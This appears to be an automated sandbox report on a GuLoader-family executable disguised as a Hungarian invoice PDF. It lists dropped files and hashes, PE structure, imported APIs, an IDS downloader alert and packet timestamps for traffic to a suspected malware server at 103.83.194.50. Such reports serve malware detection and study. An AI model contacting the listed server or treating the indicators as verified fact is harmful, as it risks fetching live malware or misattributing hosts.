                         | Readouts.bat.exe | malicious | GuLoader |
                         | Account& Payment Transfer Details_pdf.exe | malicious | Remcos, GuLoader |
                         | Account& Payment Transfer Details_pdf.exe | malicious | GuLoader |
                         | https://updatecdn.meeting.qq.com/cos/37a67c4f1858c83dff9f22a27bb8f27d/VooVMeeting_1410000197_3.23.1.510.publish.exe | malicious | Unknown |
                         | 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe | malicious | GuLoader |
                         | 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe | malicious | GuLoader |
                         | rjustificantePago_es_180214093508pdf.exe | malicious | GuLoader |
                         | rjustificantePago_es_180214093508pdf.exe | malicious | GuLoader |
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):5632
                                            Entropy (8bit):3.81704362174321
                                            Encrypted:false
                                            SSDEEP:48:S46+/p2TKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mhofjLl:zf2uPbOBtWZBV8jAWiAJCdv2CmwL
                                            MD5:3DD80DFF583544514EEB3A5ED851A519
                                            SHA1:56F7324D9D4230C96D1963E7B3E02B05A6CF5C24
                                            SHA-256:86CFF5EACA76C49F924CB123D242FDCFD45AB99C4B638D3B8F4A8CFB1970AB5B
                                            SHA-512:955F4DF195B5D134449904E9020F80125CFB64D70D9482FF583451F3FCB10D15577CEAC4180F71A96452D8478F6365160AB15731F9A79A494383087C9310FD1D
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: Readouts.bat.exe, Detection: malicious
                                            • Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious
                                            • Filename: Readouts.bat.exe, Detection: malicious
                                            • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious
                                            • Filename: Account& Payment Transfer Details_pdf.exe, Detection: malicious
                                            • Filename: , Detection: malicious
                                            • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious
                                            • Filename: 3rd_Reminder_for_210041096_B.S._TRANS_SARL_210-ma-1539321pdf.exe, Detection: malicious
                                            • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious
                                            • Filename: rjustificantePago_es_180214093508pdf.exe, Detection: malicious
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):11776
                                            Entropy (8bit):5.890541747176257
                                            Encrypted:false
                                            SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                            MD5:75ED96254FBF894E42058062B4B4F0D1
                                            SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                            SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                            SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 3%
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):301304
                                            Entropy (8bit):7.58364346351443
                                            Encrypted:false
                                            SSDEEP:6144:q7mexgJJRFhsmjjRVL+1/cTu0dHRznByBM:SqRhsCj3+1/cTpzn
                                            MD5:629228928F5AD39C03B3725A4AEEAAF2
                                            SHA1:18BAB31B830F9C32865DFDEF458D3CF004D077B1
                                            SHA-256:8FAA952A9CBBED1B515407BA233CB1836FB7A17ED3298D2B595EE429D026AC5D
                                            SHA-512:1A26ADC3BD2C8B4E77E69676340592F112A414F7EA1F40D53D749B3ADC8403FE7721279E59C111A44560E9B682F9DACDE29E230798907459174B28910CDC95F8
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):111480
                                            Entropy (8bit):2.652515826780512
                                            Encrypted:false
                                            SSDEEP:1536:gG1ys1vp+PfyxLJb5ZNT1vbdScrOL+LnHjGuI6Ig:Iub7v9VDT
                                            MD5:011FFFF988C035CCE9DD2C1387C79288
                                            SHA1:2B7FFDE1679303FCFFE49F102FE50B988F548553
                                            SHA-256:5B3465BDF005F715C27A7677BEE19E1684AE5691C84DA67E94D5FB4D00C51960
                                            SHA-512:B6E17F54F658F4BCF9867CCB6FD36C43E4EABA8F9CBE774D07F96B8F5FA9243DB4C34EA1C2A9E65F9A5B4FFD219D2638B6960F3D01DC02BA2CAAD40BD14A6C5B
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):455315
                                            Entropy (8bit):1.2477113828127742
                                            Encrypted:false
                                            SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                            MD5:761F2A757CD380F71E205335CE088495
                                            SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                            SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                            SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                            Category:dropped
                                            Size (bytes):165466
                                            Entropy (8bit):6.5947581943238625
                                            Encrypted:false
                                            SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                            MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                            SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                            SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                            SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):321960
                                            Entropy (8bit):1.240482616634199
                                            Encrypted:false
                                            SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                            MD5:66087BEC9068998EE8F271F0580AB3F5
                                            SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                            SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                            SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):263192
                                            Entropy (8bit):1.2599632446975992
                                            Encrypted:false
                                            SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                            MD5:0EDAE6068FC853ECD4597C0C717729E8
                                            SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                            SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                            SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):38
                                            Entropy (8bit):4.006841738213845
                                            Encrypted:false
                                            SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                            MD5:8674B487F44FE91156094E810B1A3128
                                            SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                            SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                            SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                            Malicious:false
                                            Preview:[parsimoniously]..Vesigia=unassessed..
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.1934337920909615
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            File size:992'543 bytes
                                            MD5:f669eaf2b985a35f3b1bf21d73b7caf2
                                            SHA1:e789d818889992fae7365386a24539a4b3bf2765
                                            SHA256:356358084caa4c8fbc4db1da7c5a15c9566182f8193dd17a979c22d0012c5016
                                            SHA512:f8eb6a3f951420ae5e1f787ff4afffd2b3692c877aad548f7c3bffcbebdc9467d259ce90453cedb631a85a76d75abf8985f44667398105f66fa31de89e3a4bbd
                                            SSDEEP:24576:oewAoAZIk1OzKmTFZ476Bnx7eq9xQUsHVSm:CAFLEzPF276l5eq9xQhHs
                                            TLSH:9E25D006FF58C787C2EA6E7489F6B7092A2DCBD99CC38F02E54568D8B670F5834C9584
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....
                                            Icon Hash:c5cdc989d5cde097
                                            Entrypoint:0x403359
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b34f154ec913d2d2c435cbd644e91687
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080A8h]
                                            call dword ptr [004080A4h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [0042A20Ch], eax
                                            je 00007FDA210F2B33h
                                            push ebx
                                            call 00007FDA210F5DE5h
                                            cmp eax, ebx
                                            je 00007FDA210F2B29h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007FDA210F5D5Fh
                                            push esi
                                            call dword ptr [00408150h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007FDA210F2B0Ch
                                            push 0000000Ah
                                            call 00007FDA210F5DB8h
                                            push 00000008h
                                            call 00007FDA210F5DB1h
                                            push 00000006h
                                            mov dword ptr [0042A204h], eax
                                            call 00007FDA210F5DA5h
                                            cmp eax, ebx
                                            je 00007FDA210F2B31h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007FDA210F2B29h
                                            or byte ptr [0042A20Fh], 00000040h
                                            push ebp
                                            call dword ptr [00408044h]
                                            push ebx
                                            call dword ptr [004082A0h]
                                            mov dword ptr [0042A2D8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 004216A8h
                                            call dword ptr [00408188h]
                                            push 0040A2C8h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x50000 | 0x5ab18 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x62a5 | 0x6400 | f4cff166abb4376522cf86cbd302f644 | False | 0.658984375 | data | 6.431390019180314 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0xa000 | 0x20318 | 0x600 | 7d0d44c89e64b001096d8f9c60b1ac1b | False | 0.4928385416666667 | data | 3.90464114821524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata | 0x2b000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0x50000 | 0x5ab18 | 0x5ac00 | 8e289f0503c71e1dae735f54bd537b3d | False | 0.3740799328512397 | data | 4.762577612489826 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_ICON | 0x504a8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.35952525372074445
                                            RT_ICON | 0x924d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.3869188453803383
                                            RT_ICON | 0xa2cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.5096473029045643
                                            RT_ICON | 0xa52a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.6343808630393997
                                            RT_ICON | 0xa6348 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.5815565031982942
                                            RT_ICON | 0xa71f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.6877049180327869
                                            RT_ICON | 0xa7b78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.723826714801444
                                            RT_ICON | 0xa8420 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | English | United States | 0.6359447004608295
                                            RT_ICON | 0xa8ae8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | English | United States | 0.2725609756097561
                                            RT_ICON | 0xa9150 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.4602601156069364
                                            RT_ICON | 0xa96b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7606382978723404
                                            RT_ICON | 0xa9b20 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.34139784946236557
                                            RT_ICON | 0xa9e08 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 0 | English | United States | 0.39549180327868855
                                            RT_ICON | 0xa9ff0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.44594594594594594
                                            RT_DIALOG | 0xaa118 | 0xb8 | data | English | United States | 0.6467391304347826
                                            RT_DIALOG | 0xaa1d0 | 0x144 | data | English | United States | 0.5216049382716049
                                            RT_DIALOG | 0xaa318 | 0x100 | data | English | United States | 0.5234375
                                            RT_DIALOG | 0xaa418 | 0x11c | data | English | United States | 0.6056338028169014
                                            RT_DIALOG | 0xaa538 | 0x60 | data | English | United States | 0.7291666666666666
                                            RT_GROUP_ICON | 0xaa598 | 0xca | data | English | United States | 0.5792079207920792
                                            RT_VERSION | 0xaa668 | 0x21c | data | English | United States | 0.5314814814814814
                                            RT_MANIFEST | 0xaa888 | 0x290 | XML 1.0 document, ASCII text, with very long lines (656), with no line terminators | English | United States | 0.5625
                                            DLL | Import
                                            KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                            USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                            GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                            ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                            Language of compilation system | Country where language is spoken | Map
                                            English | United States |
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2024-11-25T10:27:36.431130+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49813 | 103.83.194.50 | 80 | TCP
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Nov 25, 2024 10:27:36.918390989 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.918436050 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.918519020 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.918561935 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.922110081 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.922154903 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.922184944 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.922224998 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.925762892 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.925805092 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.925889015 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.925930023 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.929435015 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.929485083 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.929522038 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.929565907 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:36.933131933 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:36.933201075 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.062635899 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.062711000 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.062834024 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.062877893 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.064064026 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.064105988 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.064656973 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.064702034 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.064734936 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.064774036 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.067706108 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.067754984 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.067899942 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.067945004 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.070786953 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.070846081 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.070880890 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.070924044 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.073833942 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.073904991 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.073920012 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.073962927 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.076875925 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.076925993 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.076984882 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.077028990 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.079962969 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.080019951 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.080108881 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.080148935 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.083033085 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.083085060 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.083146095 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.083192110 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.086080074 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.086138010 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.086261034 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.086311102 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.089143038 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.089195967 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.089258909 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.089301109 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.092262983 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.092330933 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.092408895 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.092473984 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.095277071 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.095328093 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.095354080 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.095381021 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.098346949 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.098429918 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.098449945 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.098491907 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.101428032 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.101484060 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.101517916 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.101555109 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.104496956 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.104552984 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.104640961 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.104685068 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.107556105 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.107618093 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.107650042 CET8049813103.83.194.50192.168.2.4
